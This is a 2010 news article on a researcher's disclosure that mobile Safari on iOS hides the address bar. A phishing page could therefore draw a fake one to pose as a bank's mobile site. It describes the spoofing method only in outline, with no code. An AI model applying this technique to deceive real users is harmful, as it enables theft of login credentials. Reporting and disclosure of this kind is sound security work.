November 30, 2010

A loophole in how some mobile browsers display website address bars could represent an opportunity for fraudsters to trick users into believing they are visiting a trusted site.

Security researcher Nitesh Dhanjani demonstrates in a blog post for computer security training group SANS, using Bank of America's mobile banking site on iOS as a reference. Because Safari browser on iOS will "hide" the address bar of certain sites coded in HTML as mobile, Dhanjani demonstrates how simply inserting a fake address bar at the top of a page could be sufficient bait to make unsuspecting users think they are looking at the real thing.

A video demonstration follows:

If you watch closely, you'll see that Safari does show the real address bar while the site is loading. Presumably if the user is not paying close attention while the site loads, they might miss this detail. While scrolling up on the mobile page will also reveal the con, a person who is quickly logging in to their bank account might not think to check this. A trusted site is a trusted site. Of course, once they enter their username and password, it potentially gives fraudsters a chance to do some damage.

As Dhanjani explains:

Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof User Interface elements to display arbitrary URLs thus tricking the user to thinking he or she is browsing a trusted site.

He notes in his blog post that he contacted Apple regarding the issue, and that the company is aware of the potential implications. Apple did not tell Dhanjani how or when they would address the issue.